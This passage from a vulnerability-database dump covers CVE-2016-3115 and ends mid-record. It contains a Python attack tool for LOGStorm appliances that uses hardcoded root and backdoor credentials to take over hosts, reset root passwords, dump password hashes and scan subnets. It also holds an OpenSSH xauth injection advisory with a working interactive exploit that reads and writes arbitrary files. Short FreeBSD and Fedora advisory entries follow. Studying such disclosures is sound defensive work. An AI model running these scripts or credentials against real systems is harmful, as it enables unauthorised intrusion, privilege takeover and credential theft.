\n# \n# -Bonuses- \n# \n# 1) Another account's (htftp/htftp) shell is set to /bin/false, which affords at least a couple attacks \n# \n# 1.1) The appliance is vulnerable to CVE-2016-3115, which we can use to read/write to arbitrary files \n# 1.2) We can use the login to do port forwarding and hit local services, such as the Java instance running \n# in debug mode and probably exploitable with jdwp-shellifer.py (also netcat with -e is installed by default!) 
\n# \n# 2) More sql accounts: htm/htm_pwd and tvs/tvs_pwd \n# \n \nimport sys \nimport socket \nimport time \nfrom paramiko import ssh_exception \nimport paramiko \nimport MySQLdb \nimport httplib \nimport urllib \n \nSSH_BANNER = \"_/_/_/_/\" \nSSH_PORT = 22 \nMYSQL_PORT = 3306 \nMYSQL_DB = \"htr\" \nMYSQL_CMD = \"select USER_ID,hex(MD5_PASSWORD) from users;\" \nWEB_URL = \"/tvs/layout/j_security_check\" \n \nROOT_CREDS = [\"root\", \"3!acK5tratu5\"] \nHTINIT_CREDS = [\"htinit\", \"htinit\"] \nMYSQL_CREDS = [\"htr\", \"htr_pwd\"] \nWEB_CREDS = [\"webserviceuser\", \"donotChangeOnInstall\"] \n \n \ndef main(): \nif(len(sys.argv) < 2): \nprint(\"Usage: %s <action> <host>\" % sys.argv[0]) \nprint(\"Eg. %s root 10.1.1.3\\n\" % sys.argv[0]) \nprint(\"Actions: root reset sql web scan\") \nreturn \n \naction = str(sys.argv[1]) \nhost = str(sys.argv[2]) \n \nif(\"scan\" not in action): \ntry: \nsocket.inet_aton(host) \nexcept socket.error: \nprint(\"[-] %s doesn't look like a valid ip address\" % host) \nreturn \n \nssh = paramiko.SSHClient() \nssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) \n \n# \n# ssh login as root and execute 'id' \n# \nif(action == \"root\"): \ntry: \nssh.connect(host, SSH_PORT, ROOT_CREDS[0], ROOT_CREDS[1], timeout=SSH_TIMEOUT) \nexcept ssh_exception.AuthenticationException: \nprint(\"\\n[-] Action failed, could not login with root credentials\\n\") \nreturn \n \nprint(\"[+] Success!\") \nssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(\"id\") \nprint(ssh_stdout.readline()) \n \nreturn \n \n# \n# ssh login as htinit and reset root password to the default \n# \nelif(action == \"reset\"): \nprint(\"[~] Resetting password on %s...\" % host) \n \ntry: \nssh.connect(host, SSH_PORT, HTINIT_CREDS[0], HTINIT_CREDS[1], timeout=SSH_TIMEOUT) \nexcept ssh_exception.AuthenticationException: \nprint(\"\\n[-] Reset failed, could not login with htinit credentials\\n\") \nreturn \n \nssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(\"\") \n 
\nssh_stdin.write(\"4\" + \"\\n\") \ntime.sleep(2) \nssh_stdin.write(ROOT_CREDS[1] + \"\\n\") \ntime.sleep(2) \nssh_stdin.write(\"^C\" + \"\\n\") \ntime.sleep(1) \n \nprint(\"[+] Appliance root password should now be reset\") \n \nreturn \n \n# \n# sql login as htr and select user/hash columns from the web users table \n# \nelif(action == \"sql\"): \nprint(\"[~] Asking %s for it's web users and their password hashes...\" % host) \n \ntry: \ndb = MySQLdb.connect(host=host, port=MYSQL_PORT, user=MYSQL_CREDS[0], passwd=MYSQL_CREDS[1], db=MYSQL_DB, connect_timeout=3) \nexcept MySQLdb.Error as error: \nprint(\"\\n[-] Failed to connect to %s:\\n%s\\n\" % (host, error)) \nreturn \n \ncursor = db.cursor() \ncursor.execute(MYSQL_CMD) \n \ndata = cursor.fetchall() \n \nprint(\"[+] Got creds!\\n\") \n \nfor row in data: \nprint(\"USER_ID: %s\\nMD5_PASSWORD: %s\\n\" % (row[0], row[1])) \n \ndb.close() \n \nreturn \n \n# \n# http login as webserviceuser and gain presumably admin privileges \n# \nelif(action == \"web\"): \nprint(\"[~] Attempting to login as backdoor web user at %s...\" % host) \n \ntry: \nclient = httplib.HTTPSConnection(host) \nexcept: \nprint(\"[-] Couldn't establish SSL connection to %s\" % host) \nreturn \n \nparams = urllib.urlencode({\"j_username\" : WEB_CREDS[0], \"j_password\" : WEB_CREDS[1]}) \nheaders = {\"Host\" : host, \"Content-Type\" : \"application/x-www-form-urlencoded\", \"Content-Length\" : \"57\"} \n \nclient.request(\"POST\", WEB_URL, params, headers) \n \nresponse = client.getresponse() \n \nif(response.status == 408): \nprint(\"[+] Success!\") \nelse: \nprint(\"[-] Service returned %d %s, which is actually not our criteria for success\" % (response.status, response.reason)) \n \nreturn \n \n# \n# check the ssh network banner to identify appliances within range of <host>/24 \n# \nelif(action == \"scan\"): \ncount = 0 \nprint(\"[~] Scanning %s for LOGStorm appliances...\" % sys.argv[2]) \n \nfor x in range(1,255): \nbanner = None \n \n# \n# 
10.1.1.1/24 -> 10.1.1.[x] \n# \nhost = str(sys.argv[2]).split('/')[0][:-1] + str(x) \n \ntry: \nssh.connect(host, SSH_PORT, \"user-that-doesnt-exist\", \"pass-that-doesnt-work\", timeout=2) \nexcept ssh_exception.NoValidConnectionsError: \npass \nexcept socket.timeout: \npass \nexcept ssh_exception.AuthenticationException as error: \nbanner = ssh._transport.get_banner() \nif banner and SSH_BANNER in banner: \nprint(\"[!] %s\\n\" % host) \ncount+=1 \n \nprint(\"[+] Found %d appliance(s)\"% count) \n \nreturn \n \n \nif __name__ == \"__main__\": \nmain() \n`\n", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/140019/logstorm.py.txt"}, {"lastseen": "2016-12-05T22:19:30", "description": "", "published": "2016-03-15T00:00:00", "type": "packetstorm", "title": "OpenSSH 7.2p1 xauth Command Injection / Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3115"], "modified": "2016-03-15T00:00:00", "id": "PACKETSTORM:136234", "href": "https://packetstormsecurity.com/files/136234/OpenSSH-7.2p1-xauth-Command-Injection-Bypass.html", "sourceData": "`Author: <github.com/tintinweb> \nRef: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115 \nVersion: 0.2 \nDate: Mar 3rd, 2016 \n \nTag: openssh xauth command injection may lead to forced-command and /bin/false bypass \n \nOverview \n-------- \n \nName: openssh \nVendor: OpenBSD \nReferences: * http://www.openssh.com/[1] \n \nVersion: 7.2p1 [2] \nLatest Version: 7.2p1 \nOther Versions: <= 7.2p1 (all versions; dating back ~20 years) \nPlatform(s): linux \nTechnology: c \n \nVuln Classes: CWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection') \nOrigin: remote \nMin. Privs.: post auth \n \nCVE: CVE-2016-3115 \n \n \n \nDescription \n--------- \n \nquote website [1] \n \n>OpenSSH is the premier connectivity tool for remote login with the SSH protocol. 
It encrypts all traffic to eliminate eavesdropping, connection hijacking, and other attacks. In addition, OpenSSH provides a large suite of secure tunneling capabilities, several authentication methods, and sophisticated configuration options. \n \nSummary \n------- \n \nAn authenticated user may inject arbitrary xauth commands by sending an \nx11 channel request that includes a newline character in the x11 cookie. \nThe newline acts as a command separator to the xauth binary. This attack requires \nthe server to have 'X11Forwarding yes' enabled. Disabling it, mitigates this vector. \n \nBy injecting xauth commands one gains limited* read/write arbitrary files, \ninformation leakage or xauth-connect capabilities. These capabilities can be \nleveraged by an authenticated restricted user - e.g. one with the login shell \nconfigured as /bin/false or one with configured forced-commands - to bypass \naccount restriction. This is generally not expected. \n \nThe injected xauth commands are performed with the effective permissions of the \nlogged in user as the sshd already dropped its privileges. \n \nQuick-Info: \n \n* requires: X11Forwarding yes \n* bypasses /bin/false and forced-commands \n** OpenSSH does not treat /bin/false like /bin/nologin (in contrast to Dropbear) \n* does not bypass /bin/nologin (as there is special treatment for this) \n \nCapabilities (xauth): \n \n* Xauth \n* write file: limited chars, xauthdb format \n* read file: limit lines cut at first \\s \n* infoleak: environment \n* connect to other devices (may allow port probing) \n \n \nPoC see ref github. \nPatch see ref github. 
\n \n \nDetails \n------- \n \n// see annotated code below \n \n* server_input_channel_req (serverloop.c) \n*- session_input_channel_req:2299 (session.c [2]) \n*- session_x11_req:2181 \n \n* do_exec_pty or do_exec_no_pty \n*- do_child \n*- do_rc_files (session.c:1335 [2]) \n \nUpon receiving an `x11-req` type channel request sshd parses the channel request \nparameters `auth_proto` and `auth_data` from the client ssh packet where \n`auth_proto` contains the x11 authentication method used (e.g. `MIT-MAGIC-COOKIE-1`) \nand `auth_data` contains the actual x11 auth cookie. This information is stored \nin a session specific datastore. When calling `execute` on that session, sshd will \ncall `do_rc_files` which tries to figure out if this is an x11 call by evaluating \nif `auth_proto` and `auth_data` (and `display`) are set. If that is the case AND \nthere is no system `/sshrc` existent on the server AND it no user-specific `$HOME/.ssh/rc` \nis set, then `do_rc_files` will run `xauth -q -` and pass commands via `stdin`. \nNote that `auth_data` nor `auth_proto` was sanitized or validated, it just contains \nuser-tainted data. Since `xauth` commands are passed via `stdin` and `\\n` is a \ncommand-separator to the `xauth` binary, this allows a client to inject arbitrary \n`xauth` commands. \n \nSidenote #1: in case sshd takes the `$HOME/.ssh/rc` branch, it will pass the tainted \ninput as arguments to that script. \nSidenote #2: client code also seems to not sanitize `auth_data`, `auth_proto`. [3] \n \nThis is an excerpt of the `man xauth` [4] to outline the capabilities of this xauth \ncommand injection: \n \nSYNOPSIS \nxauth [ -f authfile ] [ -vqibn ] [ command arg ... ] \n \nadd displayname protocolname hexkey \ngenerate displayname protocolname [trusted|untrusted] [timeout seconds] [group group-id] [data hexdata] \n[n]extract filename displayname... \n[n]list [displayname...] \n[n]merge [filename...] \nremove displayname... 
\nsource filename \ninfo \nexit \nquit \nversion \nhelp \n? \n \nInteresting commands are: \n \ninfo - leaks environment information / path \n~# xauth info \nxauth: file /root/.Xauthority does not exist \nAuthority file: /root/.Xauthority \nFile new: yes \nFile locked: no \nNumber of entries: 0 \nChanges honored: yes \nChanges made: no \nCurrent input: (argv):1 \n \nsource - arbitrary file read (cut on first `\\s`) \n# xauth source /etc/shadow \nxauth: file /root/.Xauthority does not exist \nxauth: /etc/shadow:1: unknown command \"smithj:Ep6mckrOLChF.:10063:0:99999:7:::\" \n \nextract - arbitrary file write \n* limited characters \n* in xauth.db format \n* since it is not compressed it can be combined with `xauth add` to \nfirst store data in the database and then export it to an arbitrary \nlocation e.g. to plant a shell or do other things. \n \ngenerate - connect to <ip>:<port> (port probing, connect back and pot. exploit \nvulnerabilities in X.org \n \n \nSource \n------ \n \nInline annotations are prefixed with `//#!` \n \n \n/* \n* Run $HOME/.ssh/rc, /etc/ssh/sshrc, or xauth (whichever is found \n* first in this order). \n*/ \nstatic void \ndo_rc_files(Session *s, const char *shell) \n{ \n... \nsnprintf(cmd, sizeof cmd, \"%s -q -\", \noptions.xauth_location); \nf = popen(cmd, \"w\"); //#! run xauth -q - \nif (f) { \nfprintf(f, \"remove %s\\n\", //#! remove <user_tainted_data> - injecting \\n auth_display injects xauth command \ns->auth_display); \nfprintf(f, \"add %s %s %s\\n\", //#! 
\\n injection \ns->auth_display, s->auth_proto, \ns->auth_data); \npclose(f); \n} else { \nfprintf(stderr, \"Could not run %s\\n\", \ncmd); \n} \n} \n} \n \nProof of Concept \n---------------- \n \nPrerequisites: \n \n* install python 2.7.x \n* issue `#> pip install paramiko` to install `paramiko` ssh library for python 2.x \n* make sure `poc.py` \n \n \nUsage: <host> <port> <username> <password or path_to_privkey> \n \npath_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key \n \n \npoc: \n \n1. configure one user (user1) for `force-commands` and another one with `/bin/false` in `/etc/passwd`: \n \n#PUBKEY line - force commands: only allow \"whoami\" \n#cat /home/user1/.ssh/authorized_keys \ncommand=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user1@box \n \n#cat /etc/passwd \nuser2:x:1001:1002:,,,:/home/user2:/bin/false \n \n2. run sshd with `X11Forwarding yes` (kali default config) \n \n#> /root/openssh-7.2p1/sshd -p 22 -f sshd_config -D -d \n \n3. 
`forced-commands` - connect with user1 and display env information \n \n#> python <host> 22 user1 .demoprivkey \n \nINFO:__main__:add this line to your authorized_keys file: \n#PUBKEY line - force commands: only allow \"whoami\" \n#cat /home/user/.ssh/authorized_keys \ncommand=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box \n \nINFO:__main__:connecting to: user1:<PKEY>@host:22 \nINFO:__main__:connected! \nINFO:__main__: \nAvailable commands: \n.info \n.readfile <path> \n.writefile <path> <data> \n.exit .quit \n<any xauth command or type help> \n \n#> .info \nDEBUG:__main__:auth_cookie: '\\ninfo' \nDEBUG:__main__:dummy exec returned: None \nINFO:__main__:Authority file: /home/user1/.Xauthority \nFile new: no \nFile locked: no \nNumber of entries: 1 \nChanges honored: yes \nChanges made: no \nCurrent input: (stdin):3 \n/usr/bin/xauth: (stdin):2: bad \"add\" command line \n... \n \n4. `forced-commands` - read `/etc/passwd` \n \n... \n#> .readfile /etc/passwd \nDEBUG:__main__:auth_cookie: 'xxxx\\nsource /etc/passwd\\n' \nDEBUG:__main__:dummy exec returned: None \nINFO:__main__:root:x:0:0:root:/root:/bin/bash \ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin \nbin:x:2:2:bin:/bin:/usr/sbin/nologin \nsys:x:3:3:sys:/dev:/usr/sbin/nologin \nsync:x:4:65534:sync:/bin:/bin/sync \n... \n \n5. 
`forced-commands` - write `/tmp/testfile` \n \n#> .writefile /tmp/testfile `thisisatestfile` \nDEBUG:__main__:auth_cookie: '\\nadd 127.0.0.250:65500 `thisisatestfile` aa' \nDEBUG:__main__:dummy exec returned: None \nDEBUG:__main__:auth_cookie: '\\nextract /tmp/testfile 127.0.0.250:65500' \nDEBUG:__main__:dummy exec returned: None \nDEBUG:__main__:/usr/bin/xauth: (stdin):2: bad \"add\" command line \n \n#> ls -lsat /tmp/testfile \n4 -rw------- 1 user1 user1 59 xx xx 13:49 /tmp/testfile \n \n#> cat /tmp/testfile \n\\FA65500hi\\FA65500`thisisatestfile`\\AA \n \n6. `/bin/false` - connect and read `/etc/passwd` \n \n#> python <host> 22 user2 user2password \nINFO:__main__:connecting to: user2:user2password@host:22 \nINFO:__main__:connected! \nINFO:__main__: \nAvailable commands: \n.info \n.readfile <path> \n.writefile <path> <data> \n.exit .quit \n<any xauth command or type help> \n \n#> .readfile /etc/passwd \nDEBUG:__main__:auth_cookie: 'xxxx\\nsource /etc/passwd\\n' \nDEBUG:__main__:dummy exec returned: None \nINFO:__main__:root:x:0:0:root:/root:/bin/bash \ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin \nbin:x:2:2:bin:/bin:/usr/sbin/nologin \nsys:x:3:3:sys:/dev:/usr/sbin/nologin \n... \nuser2:x:1001:1002:,,,:/home/user2:/bin/false \n... \n \n7. `/bin/false` - initiate outbound X connection to 8.8.8.8:6100 \n \n#> generate 8.8.8.8:100 . \n \n#> tcpdump \nIP <host>.42033 > 8.8.8.8.6100: Flags [S], seq 1026029124, win 29200, options [mss 1460,sackOK,TS val 431416709 ecr 0,nop,wscale 10], length 0 \n \n \nMitigation / Workaround \n------------------------ \n \n* disable x11-forwarding: `sshd_config` set `X11Forwarding no` \n* disable x11-forwarding for specific user with forced-commands: `no-x11-forwarding` in `authorized_keys` \n \nNotes \n----- \n \nVerified, resolved and released within a few days. very impressive. 
\n \nVendor response: see advisory [5] \n \nReferences \n---------- \n \n[1] http://www.openssh.com/ \n[2] https://github.com/openssh/openssh-portable/blob/5a0fcb77287342e2fc2ba1cee79b6af108973dc2/session.c#L1388 \n[3] https://github.com/openssh/openssh-portable/blob/19bcf2ea2d17413f2d9730dd2a19575ff86b9b6a/clientloop.c#L376 \n[4] http://linux.die.net/man/1/xauth \n[5] http://www.openssh.com/txt/x11fwd.adv \n \n======== poc.py ======== \n \n#!/usr/bin/env python \n# -*- coding: UTF-8 -*- \n# Author : <github.com/tintinweb> \n############################################################################### \n# \n# FOR DEMONSTRATION PURPOSES ONLY! \n# \n############################################################################### \nimport logging \nimport StringIO \nimport sys \nimport os \n \nLOGGER = logging.getLogger(__name__) \ntry: \nimport paramiko \nexcept ImportError, ie: \nlogging.exception(ie) \nlogging.warning(\"Please install python-paramiko: pip install paramiko / easy_install paramiko / <distro_pkgmgr> install python-paramiko\") \nsys.exit(1) \n \nclass SSHX11fwdExploit(object): \ndef __init__(self, hostname, username, password, port=22, timeout=0.5, \npkey=None, pkey_pass=None): \nself.ssh = paramiko.SSHClient() \nself.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) \nif pkey: \npkey = paramiko.RSAKey.from_private_key(StringIO.StringIO(pkey),pkey_pass) \nself.ssh.connect(hostname=hostname, port=port, \nusername=username, password=password, \ntimeout=timeout, banner_timeout=timeout, \nlook_for_keys=False, pkey=pkey) \n \ndef exploit(self, cmd=\"xxxx\\n?\\nsource /etc/passwd\\n\"): \ntransport = self.ssh.get_transport() \nsession = transport.open_session() \nLOGGER.debug(\"auth_cookie: %s\"%repr(cmd)) \nsession.request_x11(auth_cookie=cmd) \nLOGGER.debug(\"dummy exec returned: %s\"%session.exec_command(\"\")) \n \ntransport.accept(0.5) \nsession.recv_exit_status() # block until exit code is ready \nstdout, stderr = [],[] \nwhile 
session.recv_ready(): \nstdout.append(session.recv(4096)) \nwhile session.recv_stderr_ready(): \nstderr.append(session.recv_stderr(4096)) \nsession.close() \nreturn ''.join(stdout)+''.join(stderr) # catch stdout, stderr \n \ndef exploit_fwd_readfile(self, path): \ndata = self.exploit(\"xxxx\\nsource %s\\n\"%path) \nif \"unable to open file\" in data: \nraise IOError(data) \nret = [] \nfor line in data.split('\\n'): \nst = line.split('unknown command \"',1) \nif len(st)==2: \nret.append(st[1].strip(' \"')) \nreturn '\\n'.join(ret) \n \ndef exploit_fwd_write_(self, path, data): \n''' \nadds display with protocolname containing userdata. badchars=<space> \n \n''' \ndummy_dispname = \"127.0.0.250:65500\" \nret = self.exploit('\\nadd %s %s aa'%(dummy_dispname, data)) \nif ret.count('bad \"add\" command line')>1: \nraise Exception(\"could not store data most likely due to bad chars (no spaces, quotes): %s\"%repr(data)) \nLOGGER.debug(self.exploit('\\nextract %s %s'%(path,dummy_dispname))) \nreturn path \n \ndemo_authorized_keys = '''#PUBKEY line - force commands: only allow \"whoami\" \n#cat /home/user/.ssh/authorized_keys \ncommand=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box \n''' \nPRIVKEY = \"\"\"-----BEGIN RSA PRIVATE KEY----- \nMIIEowIBAAKCAQEAtUaWCq7z5CM7wGH1/2XlNVMy7glVgYCVHjf8BUZo+FypdD69 \n9SPu06CZ3e0vSUx5KxlQ7vgU6CtH9nQli53oMy225a/RUGEon/axzVtwTpMnVLqn \nPLEUn9zPaCjwwpg/Brhr5+NHc3bm/u/LHmKrEg6IjyWssE16exuhA3G/Teed+NaN \nzKR3jVLrmXohc9dp57jYBPLZJ5NSojsd27LjdWnq/PokxwvkQOrOPkhTne+7GRts \nU68nW5a99jMSb4bpgqsUsIY0IIsKc1nfzUxonvcXmh+RASIffLCzA0OdQyJ7UrPh 
\nTLw8dVOK2e9zsJYlOYUA6G3rnzq9sNmqe7XdeQIDAQABAoIBAHu5M4sTIc8h5RRH \nSBkKuMgOgwJISJ3c3uoDF/WZuudYhyeZ8xivb7/tK1d3HQEQOtsZqk2P8OUNNU6W \ns1F5cxQLLXvS5i/QQGP9ghlBQYO/l+aShrY7vnHlyYGz/68xLkMt+CgKzaeXDc4O \naDnS6iOm27mn4xdpqiEAGIM7TXCjcPSQ4l8YPxaj84rHBcD4w033Sdzc7i73UUne \neuQL7bBz5xNibOIFPY3h4q6fbw4bJtPBzAB8c7/qYhJ5P3czGxtqhSqQRogK8T6T \nA7fGezF90krTGOAz5zJGV+F7+q0L9pIR+uOg+OBFBBmgM5sKRNl8pyrBq/957JaA \nrhSB0QECgYEA1604IXr4CzAa7tKj+FqNdNJI6jEfp99EE8OIHUExTs57SaouSjhe \nDDpBRSTX96+EpRnUSbJFnXZn1S9cZfT8i80kSoM1xvHgjwMNqhBTo+sYWVQrfBmj \nbDVVbTozREaMQezgHl+Tn6G1OuDz5nEnu+7gm1Ud07BFLqi8Ssbhu2kCgYEA1yrc \nKPIAIVPZfALngqT6fpX6P7zHWdOO/Uw+PoDCJtI2qljpXHXrcI4ZlOjBp1fcpBC9 \n2Q0TNUfra8m3LGbWfqM23gTaqLmVSZSmcM8OVuKuJ38wcMcNG+7DevGYuELXbOgY \nnimhjY+3+SXFWIHAtkJKAwZbPO7p857nMcbBH5ECgYBnCdx9MlB6l9rmKkAoEKrw \nGt629A0ZmHLftlS7FUBHVCJWiTVgRBm6YcJ5FCcRsAsBDZv8MW1M0xq8IMpV83sM \nF0+1QYZZq4kLCfxnOTGcaF7TnoC/40fOFJThgCKqBcJQZKiWGjde1lTM8lfTyk+f \nW3p2+20qi1Yh+n8qgmWpsQKBgQCESNF6Su5Rjx+S4qY65/spgEOOlB1r2Gl8yTcr \nbjXvcCYzrN4r/kN1u6d2qXMF0zrPk4tkumkoxMK0ThvTrJYK3YWKEinsucxSpJV/ \nnY0PVeYEWmoJrBcfKTf9ijN+dXnEdx1LgATW55kQEGy38W3tn+uo2GuXlrs3EGbL \nb4qkQQKBgF2XUv9umKYiwwhBPneEhTplQgDcVpWdxkO4sZdzww+y4SHifxVRzNmX \nAo8bTPte9nDf+PhgPiWIktaBARZVM2C2yrKHETDqCfme5WQKzC8c9vSf91DSJ4aV \npryt5Ae9gUOCx+d7W2EU7RIn9p6YDopZSeDuU395nxisfyR1bjlv \n-----END RSA PRIVATE KEY-----\"\"\" \n \n \nif __name__==\"__main__\": \nlogging.basicConfig(loglevel=logging.DEBUG) \nLOGGER.setLevel(logging.DEBUG) \n \nif not len(sys.argv)>4: \nprint \"\"\" Usage: <host> <port> <username> <password or path_to_privkey> \n \npath_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key \n \n\"\"\" \nsys.exit(1) \nhostname, port, username, password = sys.argv[1:] \nport = int(port) \npkey = None \nif os.path.isfile(password): \npassword = None \nwith open(password,'r') as f: \npkey = f.read() \nelif password==\".demoprivkey\": \npkey = PRIVKEY \npassword = None \nLOGGER.info(\"add this line to 
your authorized_keys file: \\n%s\"%demo_authorized_keys) \n \nLOGGER.info(\"connecting to: %s:%s@%s:%s\"%(username,password if not pkey else \"<PKEY>\", hostname, port)) \nex = SSHX11fwdExploit(hostname, port=port, \nusername=username, password=password, \npkey=pkey, \ntimeout=10 \n) \nLOGGER.info(\"connected!\") \nLOGGER.info (\"\"\" \nAvailable commands: \n.info \n.readfile <path> \n.writefile <path> <data> \n.exit .quit \n<any xauth command or type help> \n\"\"\") \nwhile True: \ncmd = raw_input(\"#> \").strip() \nif cmd.lower().startswith(\".exit\") or cmd.lower().startswith(\".quit\"): \nbreak \nelif cmd.lower().startswith(\".info\"): \nLOGGER.info(ex.exploit(\"\\ninfo\")) \nelif cmd.lower().startswith(\".readfile\"): \nLOGGER.info(ex.exploit_fwd_readfile(cmd.split(\" \",1)[1])) \nelif cmd.lower().startswith(\".writefile\"): \nparts = cmd.split(\" \") \nLOGGER.info(ex.exploit_fwd_write_(parts[1],' '.join(parts[2:]))) \nelse: \nLOGGER.info(ex.exploit('\\n%s'%cmd)) \n \n# just playing around \n#print ex.exploit_fwd_readfile(\"/etc/passwd\") \n#print ex.exploit(\"\\ninfo\") \n#print ex.exploit(\"\\ngenerate <ip>:600<port> .\") # generate <ip>:port port=port+6000 \n#print ex.exploit(\"\\nlist\") \n#print ex.exploit(\"\\nnlist\") \n#print ex.exploit('\\nadd xx xx \"\\n') \n#print ex.exploit('\\ngenerate :0 . 
data \"') \n#print ex.exploit('\\n?\\n') \n#print ex.exploit_fwd_readfile(\"/etc/passwd\") \n#print ex.exploit_fwd_write_(\"/tmp/somefile\", data=\"`whoami`\") \nLOGGER.info(\"--quit--\") \n`\n", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/136234/opensshfalse-bypass.txt"}], "freebsd": [{"lastseen": "2019-05-29T18:32:46", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3115"], "description": "\nThe OpenSSH project reports:\n\nMissing sanitisation of untrusted input allows an\n\t authenticated user who is able to request X11 forwarding\n\t to inject commands to xauth(1).\n\t \nInjection of xauth commands grants the ability to read\n\t arbitrary files under the authenticated user's privilege,\n\t Other xauth commands allow limited information leakage,\n\t file overwrite, port probing and generally expose xauth(1),\n\t which was not written with a hostile user in mind, as an\n\t attack surface.\n\t \nMitigation:\nSet X11Forwarding=no in sshd_config. This is the default.\nFor authorized_keys that specify a \"command\" restriction,\n\t also set the \"restrict\" (available in OpenSSH >=7.2) or\n\t \"no-x11-forwarding\" restrictions.\n\t \n\n", "edition": 4, "modified": "2016-08-09T00:00:00", "published": "2016-03-11T00:00:00", "id": "E4644DF8-E7DA-11E5-829D-C80AA9043978", "href": "https://vuxml.freebsd.org/freebsd/e4644df8-e7da-11e5-829d-c80aa9043978.html", "title": "openssh -- command injection when X11Forwarding is enabled", "type": "freebsd", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3115"], "description": "SSH (Secure SHell) is a program for logging into and executing commands on a remote machine. 
SSH is intended to replace rlogin and rsh, and to provide secure encrypted communications between two untrusted hosts over an insecure network. X11 connections and arbitrary TCP/IP ports can also be forwarded over the secure channel. OpenSSH is OpenBSD's version of the last free version of SSH, bringing it up to date in terms of security and features. This package includes the core files necessary for both the OpenSSH client and server. To make this package useful, you should also install openssh-clients, openssh-server, or both. ", "modified": "2016-03-29T19:23:45", "published": "2016-03-29T19:23:45", "id": "FEDORA:ECCBA601614F", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: openssh-6.9p1-11.fc22", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3115"], "description": "SSH (Secure SHell) is a program for logging into and executing commands on a remote machine. SSH is intended to replace rlogin and rsh, and to provide secure encrypted communications between two untrusted hosts over an insecure network. X11 connections and arbitrary TCP/IP ports can also be forwarded over the secure channel. OpenSSH is OpenBSD's version of the last free version of SSH, bringing it up to date in terms of security and features. This version of OpenSSH has been modified to support GSI authentication. This package includes the core files necessary for both the gsissh client and server. To make this package useful, you should also install gsi-openssh-clients, gsi-openssh-server, or both. 
", "modified": "2016-05-07T13:36:50", "published": "2016-05-07T13:36:50", "id": "FEDORA:34AAC6006272", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: gsi-openssh-7.2p2-2.fc24", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3115"], "description": "SSH (Secure SHell) is a program for logging into and executing commands on a remote machine. SSH is intended to replace rlogin and rsh, and to provide secure encrypted communications between two untrusted hosts over an insecure network. X11 connections and arbitrary TCP/IP ports can also be forwarded over the secure channel. OpenSSH is OpenBSD's version of the last free version of SSH, bringing it up to date in terms of security and features. This package includes the core files necessary for both the OpenSSH client and server. To make this package useful, you should also install openssh-clients, openssh-server, or both. ", "modified": "2016-03-27T00:54:18", "published": "2016-03-27T00:54:18", "id": "FEDORA:6D06760BBCF5", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: openssh-7.2p2-1.fc24", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": 